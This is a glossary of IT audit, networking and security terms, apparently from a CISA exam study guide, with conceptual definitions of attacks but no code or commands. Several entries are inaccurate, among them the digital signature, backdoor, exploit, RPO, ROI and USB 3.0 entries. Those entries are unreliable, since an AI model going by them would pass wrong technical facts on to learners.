Glossary

802.11 standard A legacy set of wireless LAN standards developed by Working Group 11 of the IEEE LAN/MAN Standards Committee. 802.11 is known for its use of WEP and RC4.

A

accreditation Management’s formal acceptance of a system or an application.

ACID test Testing the following: atomicity, to divide work so that the results are either all or nothing; consistency, to ensure that transactions are processed only if they meet system defined integrity constraints; isolation, to ensure that each transaction is isolated from all others until complete; and durability, to ensure that when a transaction is processed, the transaction cannot be rolled back and is accurate.

Address Resolution Protocol (ARP) A protocol used to map a known IP address to an unknown physical address on the local network. For example, IPv4 uses 32-bit addresses, whereas Ethernet uses 48-bit MAC addresses. The ARP process can use the known IP address that is being passed down the stack to resolve the unknown MAC address by means of a broadcast message. This information is helpful in an ARP cache.

AES The current symmetric standard and a replacement for DES. AES uses the Rijndael algorithm. Used by WPA2.

agile An iterative, expedited, and incremental software development methodology.

algorithm A mathematical procedure used for solving a problem. Commonly used in cryptography.

application controls Controls related to a specific individual process within an application.

artificial intelligence (AI) An extension of expert systems that involves self-learning and cognitive processes used to mimic the thinking of humans with the speed of computers.

assessment An evaluation and/or valuation of IT assets based on predefined measurement or evaluation criteria. An accounting or auditing firm is not typically required to conduct an assessment such as a risk or vulnerability assessment.

asymmetric algorithm A routine that uses a pair of different but related cryptographic keys to encrypt and decrypt data.

asymmetric encryption In cryptography, use of an asymmetric key algorithm with a pair of cryptographic keys to encrypt and decrypt. The two keys are related mathematically, and a message encrypted by the algorithm using one key can be decrypted by the same algorithm using the other. In a sense, one key “locks” a lock (encryption), and a different key is required to unlock it (decryption).

audit An investigation by an accounting or auditing firm that conforms to a specific and formal methodology and definition for how the investigation is to be conducted, with specific reporting elements and metrics being examined (such as a financial audit according to Public Accounting and Auditing Guidelines and Procedures).

audit function An independent and objective function that provides leadership assurance that the organization complies with regulatory rules and industry norms.

audit universe The range of audit activities and auditable entities to be covered in an audit.

authentication A method that enables identification of someone. Authentication verifies the identity and legitimacy of an individual to access a system and its resources. Common authentication methods include passwords, tokens, and biometric systems.

automated controls Controls that are triggered through automation, such as validation and edit checks, programmed logic functions, and controls.

B

backdoor A piece of software that allows access to a computer without using the conventional security procedures. Backdoors are also known as Trojans.

balance data Various values and totals that might be held temporarily during processing.

balanced scorecard (BSC) A scorecard that brings together in one view an array of key measurements, such as metrics, target values, and key indicators.

baseline A platform-specific rule that is accepted across the industry as providing the most effective approach to a specific implementation.

batch control Control that validates a batch of transactions, such as total dollar amounts, total counts, or total document numbers.

biometrics A method of verifying a person’s identify for authentication by analyzing a unique physical attribute of the individual, such as a fingerprint, retinal scan, or palm print.

blackbox testing A form of testing in which the tester has no knowledge of the target or its network structure.

Blowfish A form of symmetric block encryption designed in 1993.

Bluejacking Sending unsolicited messages, pictures, or information to a Bluetooth user.

Bluesnarfing Stealing information from a wireless device through a Bluetooth connection.

botnet A collection of robot-controlled workstations.

bring-your-own-device (BYOD) The practice of allowing users to bring and use their personal devices on a corporate network.

buffer overflow In computer programming, a problem that occurs when a software application somehow writes data beyond the allocated end of a buffer in memory. Buffer overflow is usually caused by software bugs and improper syntax and programming, and it exposes an application to malicious code injections or other targeted attack commands.

Business continuity planning A system or methodology to create a plan for how an organization will resume partially or completely interrupted critical functions within a predetermined time after a disaster or disruption occurs. The goal is to keep critical business functions operational.

business impact analysis A component of the business continuity plan that involves looking at all the components that an organization is reliant upon for continued functionality. It seeks to distinguish which are more crucial than others and requires a greater allocation of funds in the wake of a disaster.

C

capability maturity model (CMM) A process that scores maturity of processes against industry standards.

carrier-sense multiple access with collision detection (CSMA/CD) The access method used by local area networking technologies such as Ethernet.

chain of custody The process and tools used to account for who had access to collected data and to protect it from being tampered with.

CISA certification A certification which ensures that individuals have the competency to provide leadership with the assurance that their organization complies with regulatory and industry norms.

CISA exam domains The basis for the CISA exam and the requirements to earn the certification; see job practice areas, or job domains.

CISA exam windows The three times per year when an individual can take the CISA exam. Each exam window is approximately 60 days long.

Code of Professional Ethics The code that ISACA has presented to guide the professional and personal conduct of members of the association and/or its certification holders. This is one of the three agreements you must sign off on as part of the CISA application.

cold site A site that contains no computing-related equipment except for environmental support, such as air conditioners and power outlets, and a security system made ready for installing computer equipment.

compliance function A discipline accountable for certifying compliance with regulatory rules and industry norms.

compliance test A test used to verify conformity to a specific standard.

computer-assisted audit techniques (CAATs) Software audit tools used for statistical sampling and data analysis.

computer-based testing (CBT) A format of testing completed on the computer instead of with paper and pencil.

continuing professional education (CPE) Continuing education hours that are required to maintain CISA certification. An individual maintains competency by attaining and reporting annual CPE hours.

continuous monitoring Repeated testing of a control through automation and alerting when a variance or defect is identified.

control function A discipline accountable for building, implementing, and maintaining technology controls.

Control Objectives for Information and Related Technologies (COBIT) A framework used to ensure quality, control, and reliability of information systems by establishing IT governance, management structure, and objectives.

control risk The risk related to a deployed control not working as expected.

control self-assessment (CSA) A process in which a business participates in a formal self-assessment of risk.

CPE hours See continuing professional education (CPE).

cracker A term derived from “criminal hacker,” someone who acts in an illegal manner.

Criticality The quality, state, degree, or measurement of the highest importance.

critical path methodology (CPM) A methodology that determines what activities are critical and what the dependencies are among the various tasks.

Cross-Site Request Forgery (XSRF) An attack that occurs when unauthorized commands are transmitted from a user that the web application trusts.

Cross-Site Scripting (XSS) An attack that enables attackers to inject client-side scripts into web pages viewed by other users.

D

data classification A method to simplify data handling rules by categorizing data into distinct data classes.

data lake A large store of raw data stored in its native format until it is needed.

data warehouse A large store of processed and refined data obtained from multiple sources that is generally used to guide management decisions.

decryption The process of converting encrypted content into its original form, often the process of converting ciphertext to plaintext. Decryption is the opposite of encryption.

defense-in-depth Multilayered security that includes administrative, technical, or logical layers.

demilitarized zone (DMZ) The middle ground between a trusted internal network and an untrusted, external network. Services that internal and external users must use, such as HTTP, are typically placed in the DMZ.

detection risk The risk of a control defect going undetected, such as when an auditor fails to find a material error or a defect in a control.

Diameter A centralized authentication system that is seen as a replacement for RADIUS.

dictionary attack A type of cryptographic attack in which the attacker uses a word list or dictionary list to try to crack an encrypted password. A newer technique is to use a time/memory trade-off, as in rainbow tables.

digital certificate A certificate usually issued by a trusted third party that contains the name of a user or server, a digital signature, a public key, and other elements used in authentication and encryption. X.509 is the most common type.

digital signature An electronic signature that can be used to authenticate the identity of the sender of a message. A digital signature is usually created by encrypting the user’s private key and is decrypted with the corresponding public key.

direct-sequence spread spectrum (DSSS) A technique used to scramble the signal of wireless devices.

Disaster A natural or man-made event that can include fire, flood, storm, and equipment failure that negatively affects an industry or facility.

Disaster recovery A set of policies, procedures, and methodologies used to address the recovery or continuation of vital technology infrastructure and systems following a disaster.

Domain Name Service (DNS) A service that translates alphanumeric domain names into IP addresses and vice versa. Because domain names are alphanumeric, it’s easier to remember these names than to remember IP addresses.

Domain Name System Security Extensions (DNSSEC) A secure version of DNS that provides authentication and integrity.

dropper A program designed to drop a Trojan horse or malware onto the infected computer and then execute it. Also known as a wrapper.

E

e-commerce The buying, selling, and servicing of goods via the Internet.

encryption The process of turning plaintext into ciphertext.

encryption key A sequence of characters used by an encryption algorithm to encrypt plaintext into ciphertext.

enterprise architecture (EA) A blueprint that defines the business structure and operation of the organization.

enterprise risk management (ERM) The process of identifying and managing a portfolio of risk to provide key stakeholders with a substantiated and consistent opinion of risk across the enterprise.

entity integrity Assurance that each database transaction record contains a primary key.

entity relationship diagram (ERD) A diagram that helps map the requirements and define the relationships between elements.

equal error rate (EER) A comparison measurement for different biometric devices and technologies to measure their accuracy. The EER is the point at which FAR and FRR are equal or cross over. The lower the EER, the more accurate the biometric system.

Ethernet A network protocol that defines a specific implementation of the physical and data link layers in the OSI model (IEEE 802.3). Ethernet LANs provide reliable high-speed communications up to 10Gbps in a limited geographic area (such as an office complex or a university complex).

ethical hack A type of hack done to help a company or an individual identify potential threats on the organization’s IT infrastructure or network. Ethical hackers must obey rules of engagement, do no harm, and stay within legal boundaries.

ethical hacker A security professional who legally attempts to break into a computer system or network to find its vulnerabilities.

exploit A vulnerability in software or hardware that can be exploited by a hacker to gain access to a system or service.

F

false acceptance rate (FAR) A type II biometric device error. It is a biometric system measurement that indicates the percentage of individuals who are incorrectly granted access. This is the worst type of error that can occur because it means that unauthorized individuals have been allowed access.

false rejection rate (FRR) A biometric device error that is considered a type I error. It is a biometric system measurement that indicates the percentage of authorized individuals who are incorrectly denied access.

fiber-optic cable A medium for transmission composed of many glass fibers. Light-emitting diodes or lasers send light through the fiber to a detector that converts the light back to an electrical signal for interpretation. Advantages include huge bandwidth, immunity to electromagnetic interference, and the capability to traverse long distances with minimal signal degradation.

fiduciary A duty of an individual (such as an auditor) who holds a position of special legal trust and responsibility.

file infector A type of virus that copies itself into executable programs.

financial audit A review and evaluation of financial statements and processes.

firewall security A system in hardware or software form used to manage and control both network connectivity and network services. Firewalls act as chokepoints for traffic entering and leaving the network and prevent unrestricted access. Firewalls can be stateful or stateless.

flowchart A graphical categorization of inputs and outputs related to a process or code logic.

frequency-hopping spread spectrum (FHSS) One of the basic modulation techniques used in spread-spectrum signal transmission. FHSS makes wireless communication harder to intercept and more resistant to interference.

function point analysis (FPA) An ISO-approved method for estimating the complexity of software.

fuzzing A blackbox testing technique.

G

general controls Controls that apply across all system components, processes, and data.

gray box testing Testing that occurs with only partial knowledge of the network or that is performed to see what internal users have access to.

guidelines A suggested set of behaviors.

H

hash A cryptographic sum that is a one-way value. A hash is considerably shorter than the original text and can be used to uniquely identify it. You might have seen a hash value next to applications available for download on the Internet. By comparing the hash of the application with the one on the application vendor’s website, you can make sure the file has not been changed or altered.

hashing algorithm An algorithm that is used to verify the integrity of data and messages. A well-designed hashing algorithm examines every bit of the data while it is being condensed, and even a slight change to the data results in a large change in the message hash. It is considered a one-way process. MD5 and SHA are examples of hashing algorithms.

hash total A calculation generated by choosing a selected number of fields in a series of transactions.

honeypot An Internet-attached server that acts as a decoy, luring in potential hackers in order to study their activities and monitor how they are able to break into a system.

hot site A fully prepared and configured site that is ready for use.

hub An older network device used for physical connectivity in networks. It provides connectivity, amplification, and signal regeneration.

I

information security/cybersecurity The people, processes, and technology in which technology security risks are assessed and electronic data is protected against unauthorized access.

information systems standards The standards adopted by ISACA that are a cornerstone of its professional contribution to the audit and assurance community. One of the three agreements you must sign off on as part of the CISA application.

Information Technology Infrastructure Library (ITIL) A series of documents that define how to execute information technology service management (ITSM) processes.

inherent risk The risk that exists if no controls are deployed.

integrated audit An audit that covers all controls, including technology, financial, and operational controls, in determining an effective set of internal controls for the protection of an organization’s assets.

Integrated Services Digital Network (ISDN) A system that provides simultaneous voice and high-speed data transmission through a single channel to the user’s premises. ISDN is an international standard for the end-to-end digital transmission of voice, data, and signaling.

Internet An interconnected system of networks that connects computers around the world via TCP/IP.

Internet Control Message Protocol (ICMP) Part of TCP/IP that supports diagnostics and error control. ping is a type of ICMP message.

Internet packet spoofing (IP spoofing) A technique used to gain unauthorized access to computers or conduct denial of service attacks. Newer routers and firewall arrangements can offer protection against IP spoofing.

Internet Protocol (IP) One of the key protocols of TCP/IP. The IP protocol is found at Layer 3 (network layer) of the OSI model.

intrusion detection system (IDS) A network monitoring device typically installed at Internet ingress/egress points that is used to inspect inbound and outbound network activity and identify suspicious patterns that might indicate a network or system attack from someone attempting to break into or compromise a system.

IT steering committee A group that is tasked with ensuring that the IT department’s goals are properly aligned with the goals of the business.

J

JBOD A technique that is somewhat like RAID, in that two or more hard drives are combined into one storage array. However, JBOD offers none of the fault tolerance advantages of RAID.

job practice areas, or job domains The five domains of the CISA exam:

Domain 1—The Process of Auditing Information Systems

Domain 2—Governance and Management of IT

Domain 3—Information Systems Acquisition, Development and Implementation

Domain 4—Information Systems Operations, Maintenance and Service Management

Domain 5—Protection of Information Assets

K

Kerberos A single sign-on service that is composed of an authentication service and a ticket-granting service.

key goal indicator (KGI) A key metric that shows how well a process is performing against a stated goal.

key performance indicator (KPI) A key metric that shows how well a process is performing.

kilo lines of code (KLOC) A technique used to determine the cost of software development that is based solely on length of code.

knowledge statements Questions on the CISA exam that cover hard skills such as how to plan an audit.

L

lagging indicator An indicator of an event that appears well after the initial event occurs.

leading indicator An indicator of an event that appears before the initial event occurs.

legal function A discipline accountable for understanding the core set of commonly accepted rules and principles of the industry in adherence to the law.

local area network (LAN) A group of wired or wireless computers and associated devices that share a common communications line and typically share the resources of a single processor or server within a small geographic area (for example, within an office building).

logic bomb A dangerous type of malware that waits for a predetermined event or an amount of time to execute its payload. Typically used by disgruntled employees for insider attacks.

long-term business goals Goals with a strategic focus on activities planned for the next three to five years.

M

MAC filtering A method of controlling access on a wired or wireless network by denying access to a device based on the MAC address not matching one that is on a preapproved list.

macro infector A type of computer virus that uses Microsoft Office products such as Work and Excel. When a user opens a Microsoft document containing a macro, the computer can become infected.

macro virus A type of computer virus that infects macro files. I Love You and Melissa are examples of macro viruses.

man-in-the-middle (MITM) attack A type of attack in which the attacker can read, insert, and change information being passed between two parties without either party knowing that the information has been compromised.

mantrap A system of two doors that allows one person to enter the first door; then, after it is closed, the second door is allowed to open. Mantraps are used to control access and are also known as deadman doors.

manual controls Controls that staff must manually verify or execute, such as the review of reconciliation reports and exception reports.

massive array of inexpensive disks (MAID) A backup solution that is designed to remove the biggest obstacle of power consumption to the use of hard disks as archive storage. MAID is only fully powered up when accessed in use and has power removed when not in use.

material Significant and having a real impact on an organization.

maximum tolerable downtime (MTD) The maximum period of time that a given business process can be inoperative before the organization’s survival is in jeopardy.

media access control (MAC) The hard-coded address of a physical-layer device that is attached to a network. Every network interface controller must have a hard-coded and unique MAC address. A MAC address is 48 bits long.

metadata Data about data, which describes the type of data contained in a file.

mindset An attitude and core principles we need to follow as professionals. The mindset sets the bar on how we should think about the challenges presented to us.

Moore’s law The belief that processing power of computers will double about every 18 months due to the rise in the number of transistors doubling per square inch.

multipartite virus A virus that attempts to attack both the boot sector and executable files.

multiple input, multiple output (MIMO) A system used in the implementation of the 802.11n standard that has multiple antennas and multiple radios.

Multiprotocol Label Switching (MPLS) A method of data-carrying used for long haul of data by high-performance telecommunications networks. MPLS directs traffic by using short path labels rather than long network addresses, thereby speeding up the process.

MU-MIMO A set of multiple-input and multiple-output technologies for wireless communication that is used by newer wireless access points to allow more devices to communicate simultaneously.

My Certifications (ISACA website) A web page on the ISACA website where you can manage your ISACA accounts and certifications.

N

network address translation (NAT) A method of connecting multiple computers to the Internet using one IP address. Many private addresses can be converted to a single public address.

Network Operations Center (NOC) An organization’s help desk or interface to its end users in which trouble calls, questions, and trouble tickets are generated.

nonrepudiation A system or method put in place to ensure that an individual cannot deny his or her own actions.

nonstatistical sampling A type of sampling in which an auditor selects the sample size and determines which items to select; also known as judgmental sampling.

O

object breakdown structure (OBS) A diagram that is used to display organizational relationships and define which users are assigned to work on a specific area of a project.

operational audit An audit to assess how well business operations are managed. This includes reviewing the organization’s policies, key processes, controls, and operating environment.

Operational Risk Operational risk is the risk of loss or disruptions from inadequate or failed internal processes, controls, people and systems. In context to information systems operational risk, it’s the loss or disruptions of technology capability due to failed internal processes, controls, people and systems.

outsourcing Using an external service provider to deliver services or solutions on an organization’s behalf.

P

packet A block of data sent over a network that transmits the identities of the sending and receiving stations for error control.

packet switching A data transmission method that involves dividing messages into standard-sized packets for greater efficiency in routing and transporting them through a network.

paper test A type of disaster-recovery test that involves reviewing the steps of the test without actually performing the steps. This type of disaster-recovery test is usually used to help team members review the proposed plan and become familiar with the test and its objectives.

password cracking The process of recovering passwords from data that has been secured by various mechanisms such as hashing.

penetration test A method of evaluating the security of a network or computer system by simulating an attack by a malicious hacker but without doing harm and with the owner’s consent.

personal area network (PAN) A small network used to connect Bluetooth devices.

phishing The act of misleading or conning an individual into releasing and providing personal and confidential information to an attacker masquerading as a legitimate individual or business.

phreaker An individual who hacks phone systems or phone-related equipment. Phreakers predate computer hackers.

Plan-Do-Check-Act (PDCA) An iterative four-step problem-solving model that promotes continuous improvement.

policy A set of behavior rules mandated by management; the policy environment often includes standards, procedures, and baselines.

polymorphic virus A virus that is capable of change and self-mutation.

port A connection used by protocols and applications. Port numbers are divided into three ranges: well-known ports, registered ports, and dynamic and/or private ports. Well-known ports are those from 0 through 1023, registered ports are those ranging from 1024 through 49151, and dynamic and/or private ports are those from 49152 through 65535.

Post Office Protocol (POP) A commonly implemented method of delivering email from a mail server to a client machine. Other methods include IMAP and Microsoft Exchange.

principle of least privilege A principle that improves security by limiting access to just the functions consistent with the individual’s job function.

procedures A written set of steps to execute policies through specific, prescribed actions; this is the how in relation to a policy. Procedures tend to be more detailed than policies. They identify the method and state in a series of steps exactly how to accomplish an intended task, achieve a desired business or functional outcome, and execute a policy.

protocol A set of formalized rules that describe how data is transmitted over a network. Low-level protocols define the electrical and physical standard, whereas high-level protocols deal with formatting of data. TCP and IP are examples of high-level LAN protocols.

prototyping The process of quickly putting together a working model (a prototype) to test various aspects of a design, illustrate ideas or features, and gather early user feedback. Prototyping is often an integral part of the development process, where it is believed to reduce project risk and cost.

proxy server A type of firewall that is used to improve performance and for added security. A proxy server intercepts all requests to the real server to see whether it can fulfill the requests itself. If not, it forwards the request to the real server.

public key encryption An encryption scheme that uses two keys. In an email transaction, the public key encrypts the data and a corresponding private key decrypts the data. Because the private key is never transmitted or publicized, the encryption scheme is extremely secure. For digital signatures, the process is reversed: The sender uses the private key to create the digital signature, and anyone who has access to the corresponding public key can read it.

Public Key Infrastructure (PKI) An infrastructure based on public-key cryptography that is used to facilitate e-commerce and build trust. PKI consists of hardware, software, people, policies, and procedures; it is used to create, manage, store, distribute, and revoke public key certificates.

Q

qualitative risk assessment A type of assessment that involves ranking the seriousness of risks and threats based primarily on an individual’s expertise and opinion.

Quality Assurance (QA) The processes and techniques involved in monitoring operations and testing outputs to ensure consistent quality by identifying errors and opportunities to improve products and services.

quantitative risk assessment A type of assessment that involves ranking the seriousness of risks and threats based primarily on data collection and data modelling.

R

rapid application development (RAD) An alternative to the conventional waterfall model that focuses on speed and uses techniques such as prototyping, iterative development, and time boxing.

recovery point objective (RPO) The amount of time in which files must be recovered from backup storage for normal operations to resume.

recovery testing Testing aimed at verifying a system’s capability to recover from various degrees of failure.

recovery time objective (RTO) During the execution of disaster recovery or business continuity plans, the time goal for the reestablishment and recovery of a business function or resource.

redundant array of inexpensive disks (RAID) A type of fault tolerance and performance improvement for disk drives that employs two or more drives in combination.

registration authority (RA) An entity responsible for the identification and authentication of a PKI certificate. The RA is not responsible for signing or issuing certificates.

Remote Authentication Dial-In User Service (RADIUS) A client/server protocol and software that allows remote-access servers to communicate. Used in wireless systems such as 802.1x.

repeater A network device used to regenerate or replicate a signal. Repeaters are used in transmission systems to regenerate analog or digital signals distorted by transmission loss.

resilience The ability for a computer system, control, or process to recover quickly after a disruption event such as a data transmission failure, power outage, etc.

return on investment (ROI) A common profitability ratio that is calculated by dividing net profit by net worth.

reverse engineering The process of taking a software program apart and analyzing its workings in detail, usually to construct a new device or program that does the same thing without actually copying anything from the original.

right-to-audit clause A contract term that allows an organization to audit an outsourcing partner’s operation.

Rijndael A symmetric encryption algorithm chosen to be the Advanced Encryption Standard (AES).

risk acceptance A decision an organization makes when it knows about a risk but makes a conscious decision to accept the risk.

risk avoidance A situation in which an organization does not perform an activity that allows risk to be present.

risk reduction A situation in which an organization employs a method of mitigating the chance a risk will occur.

risk transference A situation in which an organization transfers risk to someone else.

rotation of assignment A process that involves ensuring that individuals are moved between roles over time.

rounding down A form of computer fraud that involves rounding down dollar amounts and stealing small amounts of money. For example, the value $1,199.50 might be rounded down to $1,199.00.

S

script kiddie The lowest form of cracker, who looks for easy targets and well-worn vulnerabilities.

segregation of duties (SoD) The splitting of functions between roles to ensure that at least two individuals are engaged to perform high-risk functions.

Service level agreements (SLAs) A contractual agreement between an organization and its service provider. SLAs define and protect the organization with regard to holding the service provider accountable for the requirements as defined in an SLA.

service set ID (SSID) A sequence of up to 32 letters or numbers that is the ID, or name, of a wireless local area network and is used to differentiate networks.

SHA A hashing algorithm that uses a 160-, 256-, or 512-bit hash function.

short-term business goals Goals that address immediate concerns that are no more than 18 months into the future.

Simple Mail Transfer Protocol (SMTP) An Internet standard for electronic mail (email) transmission defined by RFC 821.

Simple Network Management Protocol (SNMP) An application-layer protocol that facilitates the exchange of management information between network devices. SNMPv1 uses well-known community strings of public and private. More recent versions, SNMPv2c and SNMPv3, provide improved performance, flexibility, and security.

smurf attack A DDoS attack in which an attacker transmits large amounts of ICMP echo request (ping) packets to a targeted IP destination device, using the targeted destination’s IP source address. This is called spoofing the IP source address. IP routers and other IP devices that respond to broadcasts respond to the targeted IP device with ICMP echo replies, thus multiplying the amount of bogus traffic.

social engineering The practice of tricking employees into revealing sensitive data about their computer system or infrastructure. This type of attack targets people using the art of human manipulation. Even when systems are physically well protected, social engineering attacks are possible.

source lines of code (SLOC) A software metric used to measure the size of a computer program by counting the number of lines in the text of the program’s source code.

SQL injection An attack in which malicious code is embedded in a poorly designed application and passed to the SQL database.

standards Mandatory actions, explicit rules, controls, or configuration settings that are designed to support and conform to a policy.

static data Data that does not change frequently, such as an individual’s Social Security number.

statistical sampling Sampling based on probability, in which every item of the population has a known chance of selection.

stochastic Based on random behavior because the occurrence of individual events cannot be predicted, yet measuring the distribution of all observations usually follows a predictable pattern.

storage area network (SAN) A high-speed subnetwork that interconnects different data storage devices with associated data servers for a large network. SANs support disk mirroring, backup and restore, archival and retrieval of archived data, data migration from one storage device to another, and the sharing of data among different servers in a network.

substantive test A test used to verify the integrity of a claim by making sure that the controls are working.

symmetric algorithm An algorithm with which both parties use the same cryptographic key.

symmetric encryption An encryption standard that requires all parties to have a copy of a shared key. A single key is used for both encryption and decryption.

SYN flood attack A DDoS attack in which the attacker sends a succession of SYN packets with a spoofed address to a targeted destination IP device but does not send the last ACK packet to acknowledge and confirm receipt. This leaves half-open connections between the client and the server until all resources are absorbed, rendering the server or targeted IP destination device unavailable because of resource allocation to the attack.

system control parameters Control values that affect how a system processes transactions.

systems development life cycle (SDLC) A method for developing information systems that has five main stages: analysis, design, development, implementation, and evaluation. Each stage has several components; for example, the development stage includes programming (coding, including internal documentation; debugging; testing; and documenting) and acquiring equipment (selection, acquisition [purchase or lease], and testing).

T

Taguchi model A statistical approach to optimizing the design of a process and improving the quality of each of its components by identifying the processes affected by outside influences (noise) that have the greatest effects on product variability and then eliminating them.

task statements Questions on the CISA exam that tests a candidate on how an auditor applies their hard skills, such as how to communicate audit examination results.

telecommunications Systems that transport information over a distance, sending and receiving audio, video, and data signals through electronic means.

Temporal Key Integrity Protocol (TKIP) An encryption protocol included as part of the IEEE 802.11i standard for wireless LANs that was created to add more security to WEP.

threat Any circumstance or event that has the potential to negatively impact an organization.

three lines of defense The idea of managing risk through three independent layers within the organization to minimize the failure to identify a major risk.

top-down testing Testing that is used to simulate the behavior of lower-level modules that are not yet integrated.

total cost of ownership (TCO) A dollar estimate used to help buyers and owners determine the direct and indirect costs of a developed system or application.

transaction A unique and logical step performed by software to perform a specific task, such as crediting a bank account after making a deposit.

transaction files Files involved in the transmission of information between two systems or applications.

Transmission Control Protocol (TCP) One of the main protocols of IP, which is used for reliability and guaranteed delivery of data.

Transmission Control Protocol/Internet Protocol (TCP/IP) A collection of protocols used to provide the basis for Internet and World Wide Web services.

turnstile A one-way gate or access control mechanism used to limit traffic and control the flow of people.

U

uninterruptible power supply (UPS) A device designed to provide a backup power supply during a power failure. Basically, a UPS is a battery backup system with an ultra-fast sensing device.

universal serial bus (USB) A specification standard for connecting peripherals to a computer. It can connect up to 127 devices to a computer, and USB 3.0 is capable of transferring data at up to 5Gbps (625Mbps).

User Datagram Protocol (UDP) A connectionless protocol that provides very few error recovery services but offers a quick and direct way to send and receive datagrams.

V

virtual LAN (VLAN) A group of devices on one or more LANs that are configured to communicate directly when in fact they may be located on a number of different LAN segments.

virtual private network (VPN) A private network that uses a public network to connect remote sites and users.

virus A computer program that has the capability to generate copies of itself and thereby spread. Viruses usually require the interaction of an individual and can have rather benign results, such as flashing a message to the screen, or rather malicious results, such as destroying data, systems, integrity, or availability.

virus scanning One of the most basic ways of scanning for computer viruses, which works by comparing suspect files and programs to signatures of known viruses stored in a database.

Voice over IP (VoIP) A combination of software and hardware that enables people to use the Internet as the transmission medium for telephone calls by sending voice data in packets via Internet Protocol.

vulnerability A flaw or weakness in a security system, software, or procedure.

W

waiver program An ISACA program for individuals who are new in the technology field which allows individuals to substitute up to three years of work experience credit, verified through the employer, when applying for CISA certification.

war driving The process of driving around a neighborhood or an area to identify wireless access points.

warm site An alternative computer facility that is partially configured and can be made ready in a few days.

white box testing A security assessment or penetration test in which all aspects of the network are known.

wide area network (WAN) A network that spans the distance between buildings, cities, and even countries. WANs are LANs connected using wide area network services from telecommunications carriers; they typically use technologies such as standard phone lines—called plain old telephone service (POTS) or public switched telephone network (PSTN)—Integrated Services Digital Network (ISDN), Frame Relay, Asynchronous Transfer Mode (ATM), and other high-speed services.

Wi-Fi Protected Access (WPA) A security standard for wireless networks designed to be more secure than WEP. Developed from the draft 802.11i standard.

Wired Equivalent Privacy (WEP) Encryption based on the RC4 encryption scheme. It was designed to provide the same level of security as a wired LAN. Because of 40-bit encryption and problems with the initialization vector, it was found to be insecure.

work breakdown structure (WBS) A process that shows what activities need to be completed in a hierarchical manner.

WPA2 The current standard in wireless security. WPA2 uses the AES and the optional Pre-Shared Key (PSK) authentication.

Z

zero-day exploit An exploit for a vulnerability that has no available vendor patch.